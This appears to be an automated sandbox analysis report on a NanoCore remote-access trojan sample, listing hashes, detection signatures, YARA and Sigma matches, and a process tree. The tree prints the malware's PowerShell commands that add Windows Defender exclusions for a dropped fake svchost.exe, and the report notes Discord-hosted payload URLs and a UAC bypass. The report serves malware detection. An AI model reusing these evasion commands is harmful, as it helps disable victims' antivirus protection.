Loading ...

Play interactive tourEdit tour

Windows Analysis Report p9Ts9VV2NZ.exe

Overview

General Information

Sample Name:p9Ts9VV2NZ.exe
Analysis ID:509658
MD5:0475ed517da8a71bc4a87f14a44cf8fe
SHA1:311e146bcc1a342ab135240e0c8e31730f8ad879
SHA256:f475dda218513a22edc7ec2e734fb91ddf60dc7b38b87e7de487de6fe9307e47
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Hides threads from debuggers
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Creates autostart registry keys with suspicious names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • p9Ts9VV2NZ.exe (PID: 4588 cmdline: 'C:\Users\user\Desktop\p9Ts9VV2NZ.exe' MD5: 0475ED517DA8A71BC4A87F14A44CF8FE)
    • powershell.exe (PID: 1068 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5684 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\p9Ts9VV2NZ.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5772 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • p9Ts9VV2NZ.exe (PID: 6264 cmdline: C:\Users\user\Desktop\p9Ts9VV2NZ.exe MD5: 0475ED517DA8A71BC4A87F14A44CF8FE)
    • p9Ts9VV2NZ.exe (PID: 6304 cmdline: C:\Users\user\Desktop\p9Ts9VV2NZ.exe MD5: 0475ED517DA8A71BC4A87F14A44CF8FE)
    • p9Ts9VV2NZ.exe (PID: 6320 cmdline: C:\Users\user\Desktop\p9Ts9VV2NZ.exe MD5: 0475ED517DA8A71BC4A87F14A44CF8FE)
    • WerFault.exe (PID: 6752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4588 -s 2636 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6356 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6396 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4588 -ip 4588 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6580 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6568 -ip 6568 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4236 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6828 -ip 6828 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6568 cmdline: 'C:\Users\Public\Documents\???????????????\svchost.exe' MD5: 0475ED517DA8A71BC4A87F14A44CF8FE)
    • powershell.exe (PID: 6932 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6956 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7004 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 6168 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 2604 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6828 cmdline: 'C:\Users\Public\Documents\???????????????\svchost.exe' MD5: 0475ED517DA8A71BC4A87F14A44CF8FE)
    • powershell.exe (PID: 2060 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2336 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6540 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 5772 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 2096 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
p9Ts9VV2NZ.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x221c:$x1: https://cdn.discordapp.com/attachments/
  • 0x22d0:$x1: https://cdn.discordapp.com/attachments/

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Documents\???????????????\svchost.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x221c:$x1: https://cdn.discordapp.com/attachments/
  • 0x22d0:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xf7ad:$x1: NanoCore.ClientPluginHost
  • 0xf7da:$x2: IClientNetworkHost
00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xf7ad:$x2: NanoCore.ClientPluginHost
  • 0x10888:$s4: PipeCreated
  • 0xf7c7:$s5: IClientLoggingHost
00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000009.00000002.578985406.00000000073D0000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x5fee:$x1: NanoCore.ClientPluginHost
    • 0x602b:$x2: IClientNetworkHost
    00000009.00000002.578985406.00000000073D0000.00000004.00020000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0x5fee:$x2: NanoCore.ClientPluginHost
    • 0x9441:$s4: PipeCreated
    • 0x6018:$s5: IClientLoggingHost
    Click to see the 107 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    9.2.p9Ts9VV2NZ.exe.7330000.30.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x605:$x1: NanoCore.ClientPluginHost
    • 0x63e:$x2: IClientNetworkHost
    9.2.p9Ts9VV2NZ.exe.7330000.30.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0x605:$x2: NanoCore.ClientPluginHost
    • 0x720:$s4: PipeCreated
    • 0x61f:$s5: IClientLoggingHost
    9.2.p9Ts9VV2NZ.exe.7170000.25.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x2dbb:$x1: NanoCore.ClientPluginHost
    • 0x2de5:$x2: IClientNetworkHost
    9.2.p9Ts9VV2NZ.exe.7170000.25.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0x2dbb:$x2: NanoCore.ClientPluginHost
    • 0x4c6b:$s4: PipeCreated
    9.2.p9Ts9VV2NZ.exe.409457d.6.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xb184:$x1: NanoCore.ClientPluginHost
    • 0x23c58:$x1: NanoCore.ClientPluginHost
    • 0xb1b1:$x2: IClientNetworkHost
    • 0x23c85:$x2: IClientNetworkHost
    Click to see the 254 entries

    Sigma Overview

    AV Detection:

    barindex
    Sigma detected: NanoCoreShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\p9Ts9VV2NZ.exe, ProcessId: 6320, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    E-Banking Fraud:

    barindex
    Sigma detected: NanoCoreShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\p9Ts9VV2NZ.exe, ProcessId: 6320, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    System Summary:

    barindex
    Sigma detected: Powershell Defender ExclusionShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\p9Ts9VV2NZ.exe' , ParentImage: C:\Users\user\Desktop\p9Ts9VV2NZ.exe, ParentProcessId: 4588, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force, ProcessId: 1068
    Sigma detected: Non Interactive PowerShellShow sources
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\p9Ts9VV2NZ.exe' , ParentImage: C:\Users\user\Desktop\p9Ts9VV2NZ.exe, ParentProcessId: 4588, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force, ProcessId: 1068
    Sigma detected: T1086 PowerShell ExecutionShow sources
    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132797736111563540.1068.DefaultAppDomain.powershell

    Stealing of Sensitive Information:

    barindex
    Sigma detected: NanoCoreShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\p9Ts9VV2NZ.exe, ProcessId: 6320, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    Remote Access Functionality:

    barindex
    Sigma detected: NanoCoreShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\p9Ts9VV2NZ.exe, ProcessId: 6320, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: p9Ts9VV2NZ.exeVirustotal: Detection: 62%Perma Link
    Source: p9Ts9VV2NZ.exeMetadefender: Detection: 22%Perma Link
    Source: p9Ts9VV2NZ.exeReversingLabs: Detection: 78%
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\Public\Documents\???????????????\svchost.exeVirustotal: Detection: 62%Perma Link
    Source: C:\Users\Public\Documents\???????????????\svchost.exeMetadefender: Detection: 22%Perma Link
    Source: C:\Users\Public\Documents\???????????????\svchost.exeReversingLabs: Detection: 78%
    Yara detected Nanocore RATShow sources
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.409457d.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.16.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.6160000.23.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.2.svchost.exe.3d8ed58.4.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.408ff54.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4af1a78.13.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.6160000.23.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.6164629.24.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.49f312a.10.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.408ff54.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4af60a1.12.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.49deafd.11.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c56c41.19.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.16.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.408b11e.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4af1a78.13.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.49d28c9.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c4d7e2.20.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c52618.18.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c52618.18.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.16.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.2.svchost.exe.3d8ed58.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4aecc42.14.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.16.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.563022898.0000000003041000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000000.354484240.0000000004271000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.439800347.00000000050AF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.564742845.000000000407B000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.557519070.0000000000402000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.567629894.0000000004C4D000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000002.576454240.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.461847446.00000000050AF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.566082157.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: p9Ts9VV2NZ.exe PID: 4588, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: p9Ts9VV2NZ.exe PID: 6320, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6568, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6828, type: MEMORYSTR
    Machine Learning detection for sampleShow sources
    Source: p9Ts9VV2NZ.exeJoe Sandbox ML: detected
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\Public\Documents\???????????????\svchost.exeJoe Sandbox ML: detected
    Source: 9.2.p9Ts9VV2NZ.exe.6160000.23.unpackAvira: Label: TR/NanoCore.fadte

    Exploits:

    barindex
    Yara detected UAC Bypass using CMSTPShow sources
    Source: Yara matchFile source: 13.0.svchost.exe.45d7a78.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.44d7a58.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.45d7a78.18.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.48f0000.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.47955b0.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.svchost.exe.45d5550.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.0.p9Ts9VV2NZ.exe.3795550.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.48f0000.19.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.5370000.7.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.45d7a78.7.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.47955b0.15.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.44d7a58.17.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.48f0000.19.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.47955b0.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.45d7a78.18.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.0.p9Ts9VV2NZ.exe.39555b0.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.svchost.exe.47955b0.4.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.svchost.exe.4615570.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.48f0000.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.svchost.exe.47955b0.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.45b5530.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.0.p9Ts9VV2NZ.exe.4530000.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.47955b0.15.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.4615570.14.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.45d5550.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.svchost.exe.45b5530.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.0.p9Ts9VV2NZ.exe.4530000.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.44d7a58.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.5370000.17.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.44d7a58.17.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.0.p9Ts9VV2NZ.exe.39555b0.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.0.p9Ts9VV2NZ.exe.37d5570.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.4615570.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.5370000.17.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.0.p9Ts9VV2NZ.exe.3775530.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.5370000.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.45d5550.13.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.16.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.45b5530.12.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0000000D.00000000.432859134.00000000045D7000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.439836868.0000000005370000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.433302468.00000000048F0000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000000.341425610.0000000003531000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.434239516.0000000004371000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.453811934.00000000045D7000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.455922021.0000000004371000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.461938081.0000000005370000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000000.346751423.0000000003955000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.567889136.0000000004371000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.576244097.0000000004795000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.457226716.0000000004795000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000000.354707047.0000000004530000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.454733014.00000000048F0000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.435662892.0000000004795000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: p9Ts9VV2NZ.exe PID: 4588, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6568, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6828, type: MEMORYSTR
    Source: p9Ts9VV2NZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49691 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49694 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49696 version: TLS 1.0
    Source: p9Ts9VV2NZ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.319928127.00000000008B7000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: svchost.exe, 0000000D.00000000.435057111.0000000006418000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.441310771.0000000006E00000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.319523647.0000000000884000.00000004.00000020.sdmp
    Source: Binary string: V3D9svchost.PDB source: svchost.exe, 0000000D.00000000.391536550.0000000000567000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbX4y~ source: p9Ts9VV2NZ.exe, 00000000.00000000.319523647.0000000000884000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb8 source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: mscorlib.pdbq source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini\??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 0000000F.00000000.441350705.0000000006E11000.00000004.00000001.sdmp
